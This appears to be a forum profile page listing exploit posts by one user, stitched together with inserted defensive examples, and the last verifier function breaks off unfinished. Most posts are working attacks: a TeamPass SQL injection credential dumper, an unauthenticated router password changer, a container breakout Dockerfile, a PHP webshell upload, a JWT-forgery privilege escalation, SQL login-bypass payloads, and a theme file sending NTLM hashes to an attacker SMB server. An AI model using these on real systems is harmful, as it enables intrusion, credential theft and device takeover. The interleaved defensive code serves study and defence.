HireHackking

Everything posted by HireHackking

  1. # Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
# Date: 2024-12-27
# Exploit Author: Doğukan Orhan
# Vendor Homepage: https://veepn.com/
# Version: 1.6.1
# Tested on: Windows 10 Pro x64

# Step to discover Unquoted Service Path:

```
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
```

# Service Info

```
C:\Users\PC>sc qc VeePNService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeePNService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\VeePN\service\VeePNService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VeePNService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
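An added defender-side check, not part of the post above: it parses `sc qc`-style output, flags services whose unquoted binary path contains a space (the condition the post reports for VeePNService) and builds the quoted path that closes the gap. The sample output below is constructed; only the VeePNService record mirrors the post, the other two services are invented for contrast.

```python
# Added example (not from the post): audit `sc qc` output for unquoted service
# paths that contain a space and produce the quoted BINARY_PATH_NAME that fixes
# them. SAMPLE_SC_QC is constructed; only VeePNService mirrors the post.
import re

SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeePNService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\VeePN\service\VeePNService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VeePNService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: QuotedSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example Vendor\svc.exe" --service
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one dict per SERVICE_NAME block."""
    services, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("SERVICE_NAME:"):
            current = {"SERVICE_NAME": line.split(":", 1)[1].strip()}
            services.append(current)
        elif current is not None and ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)   # first colon ends the key; "C:" stays in the value
            current[key.strip()] = value.strip()
    return services


def executable_path(binary_path):
    """Return the executable portion of a BINARY_PATH_NAME value, arguments dropped."""
    s = binary_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    # Unquoted: the path runs up to the first ".exe" followed by whitespace or end
    m = re.match(r"(.*?\.exe)(?:\s|$)", s, re.IGNORECASE)
    return m.group(1) if m else s.split(" ")[0]


def is_unquoted_and_spaced(binary_path):
    """True when the path is unquoted and the executable path contains a space.
    The service control manager then tries each space-delimited prefix
    (C:\\Program.exe, C:\\Program Files (x86)\\VeePN\\service\\VeePNService.exe) in turn."""
    s = binary_path.strip()
    return bool(s) and not s.startswith('"') and " " in executable_path(s)


def quoted_fix(binary_path):
    """The remediated value: executable in quotes, arguments (if any) left after it."""
    s = binary_path.strip()
    exe = executable_path(s)
    args = s[len(exe) + 2:].strip() if s.startswith('"') else s[len(exe):].strip()
    return f'"{exe}"' + (f" {args}" if args else "")


def audit_unquoted_paths(text):
    """Return (service, binary_path, start_account, fixed_path) for each risky service."""
    findings = []
    for svc in parse_sc_qc(text):
        path = svc.get("BINARY_PATH_NAME", "")
        if is_unquoted_and_spaced(path):
            findings.append((svc["SERVICE_NAME"], path,
                             svc.get("SERVICE_START_NAME", ""), quoted_fix(path)))
    return findings


if __name__ == "__main__":
    for name, path, account, fix in audit_unquoted_paths(SAMPLE_SC_QC):
        print(f"{name} runs as {account} with unquoted path: {path}")
        print(f"  fixed BINARY_PATH_NAME: {fix}")
```

The finding that matters for risk is the pair of unquoted path and `SERVICE_START_NAME : LocalSystem`; a service running as a low-privileged account with the same path shape is a far smaller problem, so the audit carries the account through to the report.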
  2. # Exploit Title: Gitea 1.24.0 - HTML Injection
# Date: 2025-03-09
# Exploit Author: Mikail KOCADAĞ
# Vendor Homepage: https://gitea.com
# Software Link: https://dl.gitea.io/gitea/1.24.0/
# Version: 1.24.0
# Tested on: Windows 10, Linux Ubuntu 22.04
# CVE : N/A

## Vulnerability Description:
In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability.

## Exploit PoC:
https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz
https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz

## Payload:
```
<h1>deneme</h1>
```

### 1. Request:

```
POST /user/settings HTTP/2
Host: demo.gitea.com
Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
Content-Length: 312
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: tr-TR,tr;q=0.9
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

_csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ&full_name=Abuzettin&description=%3Ch1%3Edeneme%3C%2Fh1%3E&website=&location=&visibility=0&keep_email_private=on
```
  3. # Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320

## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.

```
git clone https://github.com/lgandx/Responder.git
cd Responder
```

Replace `eth0` with your network interface.

## Step 2: Create a Malicious Windows Theme File

### Python Script to Generate the Malicious `.theme` File

```python
import os

# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP

# Name of the malicious theme file
theme_filename = "malicious.theme"

# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme

[Control Panel\\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Write the theme file
with open(theme_filename, "w") as theme_file:
    theme_file.write(theme_content)

print(f"[+] Malicious theme file '{theme_filename}' created.")

# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower()
if start_http == "y":
    print("[+] Starting HTTP server on port 8080...")
    os.system("python3 -m http.server 8080")
```

## Step 3: Deliver & Capture NTLM Hashes

1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash: `sudo python3 Responder.py -I eth0`
3. Wait for the victim to open the `.theme` file.
4. Extract the NTLM hash from the Responder logs and crack it using hashcat: `hashcat -m 5600 captured_hashes.txt rockyou.txt`

--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University
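Added example, not from the post: a triage check for the file type the post describes. It parses a `.theme` file as INI and reports every value that points at a UNC share, the property that makes CVE-2024-21320 leak credentials when the theme is applied; a mail gateway or EDR rule can block on that verdict. Both theme texts are constructed for this example; 192.0.2.10 is a documentation address, not a real host.

```python
# Added example (not from the post): flag .theme files whose values reference a
# remote share (\\host\share\...). Theme texts are constructed; 192.0.2.10 is a
# documentation address.
import configparser
import re

# A value that starts with \\host\ or //host/ points at a remote share
UNC_RE = re.compile(r"^\s*(?:\\\\|//)([^\\/\s]+)[\\/]")

SUSPICIOUS_THEME = r"""
[Theme]
DisplayName=Security Update Theme

[Control Panel\Desktop]
Wallpaper=\\192.0.2.10\share\wallpaper.jpg

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

BENIGN_THEME = r"""
[Theme]
DisplayName=Corporate Blue

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Web\Wallpaper\Windows\img0.jpg

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""


def parse_theme(text):
    """Parse .theme (INI) content; keys keep their case and %VAR% is left alone."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def find_remote_references(text):
    """Return (section, key, value, host) for every value that points at a UNC share.
    Every key is checked, not only Wallpaper: slideshow roots, cursors and visual
    style paths can carry the same kind of reference."""
    cp = parse_theme(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = UNC_RE.match(value)
            if m:
                hits.append((section, key, value, m.group(1)))
    return hits


def triage_theme(text):
    """Verdict for a gateway rule: 'block' when any remote path is present."""
    return "block" if find_remote_references(text) else "allow"


if __name__ == "__main__":
    for section, key, value, host in find_remote_references(SUSPICIOUS_THEME):
        print(f"[{section}] {key} -> {host}: {value}")
    print(triage_theme(SUSPICIOUS_THEME), triage_theme(BENIGN_THEME))
```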
  4. # Exploit Title: Jasmin Ransomware SQL Injection Login Bypass
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: Windows

How to exploit :

--> Open Admin Panel Through : http://localhost/login.php
--> Enter the SQL Injection Auth Bypass Payload to Email like : '=' 'or'
--> And to Access Code, Enter the same SQL Injection Authentication Bypass Payload : '=' 'or'
--> Press Authorize
--> Congratz, you're in

--> SQL Injection Authentication Bypass Payload : '=' 'or'

--> Payloads that can be used :

```
' or '1'='1
' or ''='
'=' 'or'
' OR '1'='1';-- -
' or 1 -- -
```
  5. # Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
# Software Link: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Toolkit 1.16.1
# CVE: CVE-2024-0132

Description:
NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:
Build and run a docker image based on such a Dockerfile:

```dockerfile
FROM ubuntu
RUN mkdir -p /usr/local/cuda/compat/
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```

The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey `*r0binak*` Kanibor
  6. # Exploit Title: TeamPass SQL Injection
# Google Dork: intitle:"Teampass" + inurl:index.php?page=items
# Date: 02/23/2025
# Exploit Author: Max Meyer - Rivendell
# Vendor Homepage: http://www.teampass.net
# Software Link: https://github.com/nilsteampassnet/TeamPass
# Version: 2.1.24 and prior
# Tested on: Windows/Linux
# CVE : CVE-2023-1545

```python
#!/usr/bin/env python3
import sys
import json
import base64
import logging
import requests
from typing import Optional, Dict, Any
from dataclasses import dataclass

# Logging configuration
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)


@dataclass
class TeamPassExploit:
    base_url: str
    arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'

    def __post_init__(self):
        self.vulnerable_url = f"{self.base_url}/api/index.php/authorize"

    def check_api_enabled(self) -> bool:
        """Check whether the API is enabled."""
        try:
            response = requests.get(self.vulnerable_url)
            if "API usage is not allowed" in response.text:
                logger.error("API feature is not enabled")
                return False
            return True
        except requests.RequestException as e:
            logger.error(f"Error checking the API: {e}")
            return False

    def execute_sql(self, sql_query: str) -> Optional[str]:
        """Run a SQL query through the vulnerability; its result comes back in the token's public_key claim."""
        try:
            inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \
                     "personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \
                     "FROM teampass_users WHERE login='admin"
            data = {
                "login": inject,
                "password": "h4ck3d",
                "apikey": "foo"
            }
            response = requests.post(
                self.vulnerable_url,
                headers={"Content-Type": "application/json"},
                json=data
            )
            if not response.ok:
                logger.error(f"Request failed: {response.status_code}")
                return None

            token = response.json().get('token')
            if not token:
                logger.error("Token not found in the response")
                return None

            # Decode the JWT payload (base64url, padding restored)
            token_parts = token.split('.')
            if len(token_parts) < 2:
                logger.error("Invalid JWT token")
                return None
            payload = base64.urlsafe_b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4))
            return json.loads(payload).get('public_key')
        except Exception as e:
            logger.error(f"Error executing SQL: {e}")
            return None

    def get_user_credentials(self) -> Optional[Dict[str, str]]:
        """Collect the credentials of every user."""
        try:
            # Total number of users
            user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
            if user_count is None or not str(user_count).isdigit():
                logger.error("Could not determine the number of users")
                return None
            user_count = int(user_count)
            logger.info(f"Found {user_count} users in the system")

            credentials = {}
            for i in range(user_count):
                username = self.execute_sql(
                    f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                )
                password = self.execute_sql(
                    f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                )
                if username and password:
                    credentials[username] = password
                    logger.info(f"Credentials obtained for: {username}")
            return credentials
        except Exception as e:
            logger.error(f"Error retrieving credentials: {e}")
            return None


def main():
    if len(sys.argv) < 2:
        logger.error("Usage: python3 script.py <base-url>")
        sys.exit(1)

    exploit = TeamPassExploit(sys.argv[1])
    if not exploit.check_api_enabled():
        sys.exit(1)

    credentials = exploit.get_user_credentials()
    if credentials:
        print("\nCredentials found:")
        for username, password in credentials.items():
            print(f"{username}: {password}")


if __name__ == "__main__":
    main()
```
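Added example covering both the Jasmin post (item 4) and the TeamPass post (item 6), not code from either author: the two SQL-injection shapes they use, a tautology in a concatenated WHERE clause and a UNION that supplies the credential the application will compare against, reproduced against an in-memory SQLite table next to the parameterized query that stops both. Table, columns and the single user row are constructed; `'h4ck3d'` stands in for the bcrypt hash the TeamPass script injects.

```python
# Added example (not from either post): the two injection shapes against a
# constructed SQLite table, beside the parameterized query that defeats them.
import hmac
import sqlite3

# Payloads quoted from the posts
TAUTOLOGY = "' or '1'='1"  # Jasmin post; entered in both form fields
UNION = "none' UNION SELECT 1, 'admin', 'h4ck3d' FROM users WHERE login='admin"  # TeamPass shape


def make_db():
    """Constructed schema: one user whose password the attacker does not know."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, pw TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery')")
    return db


def login_concat_where(db, login, password):
    """Jasmin-style check: both fields concatenated into one WHERE clause.
    ' or '1'='1 in each field turns the clause into a tautology."""
    sql = f"SELECT id FROM users WHERE login='{login}' AND pw='{password}'"
    return db.execute(sql).fetchone() is not None


def login_concat_union(db, login, password):
    """TeamPass-style check: the row is fetched by login and the stored credential
    is compared in application code. A UNION lets the caller supply the 'stored'
    value, so the comparison is against a value the attacker chose."""
    sql = f"SELECT id, login, pw FROM users WHERE login='{login}'"
    row = db.execute(sql).fetchone()
    return row is not None and row[2] == password


def login_parameterized(db, login, password):
    """Fixed version: a placeholder keeps the input as data, and the credential
    comparison is constant-time."""
    row = db.execute("SELECT id, login, pw FROM users WHERE login=?", (login,)).fetchone()
    return row is not None and hmac.compare_digest(row[2].encode(), password.encode())


if __name__ == "__main__":
    db = make_db()
    print("tautology vs concatenated WHERE :", login_concat_where(db, TAUTOLOGY, TAUTOLOGY))
    print("union vs fetch-then-compare    :", login_concat_union(db, UNION, "h4ck3d"))
    print("tautology vs parameterized     :", login_parameterized(db, TAUTOLOGY, TAUTOLOGY))
    print("union vs parameterized         :", login_parameterized(db, UNION, "h4ck3d"))
    print("real credentials, parameterized:", login_parameterized(db, "admin", "correct-horse-battery"))
```

The second vulnerable function is the more instructive one: hashing the stored password does not help when the attacker can make the query return a hash of their own choosing, which is exactly why the TeamPass script carries a bcrypt string in `arbitrary_hash`. Only keeping the login value out of the SQL text removes that control.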
  7. # Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
# Date: 2025-02-26
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.aztech.com
# Version: DSL5005EN
# Tested on: Linux
# CVE: N/A

```python
import requests
import argparse

print('''
#################################################################################
#  aztech DSL5005EN router/modem - admin password change (Unauthenticated)      #
#  BY: Amir Hossein Jamshidi                                                    #
#  Mail: amirhosseinjamshidi64@gmail.com                                        #
#  github: https://github.com/amirhosseinjamshidi64                             #
#  Usage: python Exploit.py --ip TARGET_IP --password PASSWORD                  #
#################################################################################
''')


def change_password(ip_address, password):
    """
    Changes the password of a device at the given IP address.

    Args:
        ip_address: The IP address of the device (e.g., "192.168.1.1").
        password: The new password to set.
    """
    url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
    origin = f"http://{ip_address}"
    referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"

    payload = {
        "saveFlag": "1",
        "adminFlag": "1",
        "SaveBtn": "SAVE",
        "uiViewTools_Password": password,
        "uiViewTools_PasswordConfirm": password
    }

    headers = {
        "Cache-Control": "max-age=0",
        "Accept-Language": "en-US,en;q=0.9",
        "Origin": origin,
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Referer": referer,
        "Connection": "keep-alive"
    }

    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"Password change request to {ip_address} successful!")
            print("Username: admin")
            print(f"Password: {password}")
        else:
            print(f"Request to {ip_address} failed with status code: {response.status_code}")
            print(f"Response content:\n{response.text}")  # Print response for debugging
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Change password of a device.")
    parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
    parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
    args = parser.parse_args()
    change_password(args.ip_address, args.password)
```
  8. # Exploit Title: MoziloCMS 3.0 - Remote Code Execution (RCE)
# Date: 10/09/2024
# Exploit Author: Secfortress (https://github.com/sec-fortress)
# Vendor Homepage: https://mozilo.de/
# Software Link: https://github.com/moziloDasEinsteigerCMS/mozilo3.0/archive/refs/tags/3.0.1.zip
# Version: 3.0
# Tested on: Debian
# Reference: https://vulners.com/cve/CVE-2024-44871
# CVE : CVE-2024-44871

"""
################
# Description  #
################

MoziloCMS version 3.0 suffers from an arbitrary file upload vulnerability in the component "/admin/index.php" which allows an authenticated attacker to execute arbitrary code in the "Files" section by uploading a maliciously crafted .JPG file and subsequently renaming its extension to .PHP using the application's renaming function.

#####################
# PoC for webshell  #
#####################

Steps to Reproduce:

1. Login as admin
2. Go to the Files section via the left menu
3. Create a .jpg file whose content is a PHP web shell
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access the webshell via this endpoint : http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php

==========================
Request 1 => Upload File:
==========================

```
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------186462060042780927583949521447
Content-Length: 607
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px; 3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep; PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b; MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="curent_dir"

Willkommen
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="chancefiles"

true
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="action"

files
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="files[]"; filename="revshell.jpg"
Content-Type: image/jpeg

<?=`$_GET[0]`?>
-----------------------------186462060042780927583949521447--
```

===========================
Request 2 => Rename File:
===========================

```
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px; 3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep; PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b; MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=files&newfile=revshell.php&orgfile=revshell.jpg&curent_dir=Willkommen&changeart=file_rename
```

####################
# Webshell access: #
####################

# Webshell access via curl:
curl http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php?0=whoami

# Output:
www-data
"""
  9. # Exploit Title : Watcharr 1.43.0 - Remote Code Execution (RCE)
# CVE-2024-48827 exploit by Suphawith Phusanbai
# Affected Watcharr version 1.43.0 and below.

```python
import argparse
import requests
import json
import jwt
from pyfiglet import Figlet

f = Figlet(font='slant', width=100)
print(f.renderText('CVE-2024-48827'))

# store the JWT token and the UserID
jwt_token = None
user_id = None


# login to obtain a JWT token
def login(host, port, username, password):
    global jwt_token, user_id
    url = f'http://{host}:{port}/api/auth/'
    # payload of the login API request
    payload = {
        'username': username,
        'password': password
    }
    headers = {
        'Content-Type': 'application/json'
    }
    # login, then keep the JWT token in jwt_token
    try:
        response = requests.post(url, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            token = response.json().get('token')
            if token:
                print(f"[+] SUCCESS! JWT Token: {token}")
                jwt_token = token
                # decode the JWT token and keep the UserID in user_id
                decoded_payload = jwt.decode(token, options={"verify_signature": False})
                user_id = decoded_payload.get('userId')
                return token
            else:
                print("[-] Check your password again!")
        else:
            print("[-] Failed :(")
            print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error! HTTP response code: {e}")


# craft the admin token (to make this work you need to know the admin username)
def create_new_jwt(original_token):
    try:
        decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
        # userId = 1 is always the admin
        decoded_payload['userId'] = 1
        new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
        print(f"[+] New JWT Token: {new_token}")
        return new_token
    except Exception as e:
        print(f"[-] Failed to create new JWT: {e}")


# privilege escalation with the crafted JWT token
def privilege_escalation(host, port, adminuser, token):
    # API endpoint that grants users the admin role
    url = f'http://{host}:{port}/api/server/users/{user_id}'
    # permission 3 gives full access; 6 and 9 give partial admin privileges.
    payload = {
        "permissions": 3
    }
    headers = {
        'Authorization': f'{token}',
        'Content-Type': 'application/json'
    }
    try:
        response = requests.post(url, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            print("[+] Privilege Escalation Successful! The current user is now an admin!")
        else:
            print(f"[-] Failed to escalate privileges. Response: {response.text}")
    except Exception as e:
        print(f"Error during privilege escalation: {e}")


# example usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
    parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
    parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
    parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
    parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
    parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
    args = parser.parse_args()

    # step 1: login
    token = login(args.host, args.port, args.username, args.password)

    # step 2: craft the admin token
    if token:
        new_token = create_new_jwt(token)

        # step 3: escalate privileges with the crafted token. Enjoy!
        if new_token:
            privilege_escalation(args.host, args.port, args.adminuser, new_token)
```
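Added example, not part of the Watcharr post: a minimal HS256 verifier written with the standard library (no PyJWT) that rejects the forgery the script performs. The script re-signs the payload with an empty secret after setting `userId` to 1; a verifier that pins the algorithm and recomputes the HMAC with the server's real key returns nothing for that token, and for an `alg: none` token. The secret and claims below are constructed.

```python
# Added example (not from the post): HS256 issue/verify with hmac + hashlib,
# showing that a token re-signed with a guessed (empty) secret, or carrying
# alg=none, does not verify. SERVER_SECRET and the claims are constructed.
import base64
import hashlib
import hmac
import json

SERVER_SECRET = b"constructed-server-secret-use-random-bytes"  # constructed; a real key is random


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload, secret):
    """Issue a compact JWT signed with HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "." +
                     b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token, secret):
    """Return the payload dict when the token is authentic, otherwise None.
    The algorithm is pinned to HS256 before any signature work, so alg=none
    and algorithm-confusion tokens are rejected without being trusted."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except ValueError:           # wrong part count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    try:
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        payload = json.loads(b64url_decode(p))
    except ValueError:
        return None
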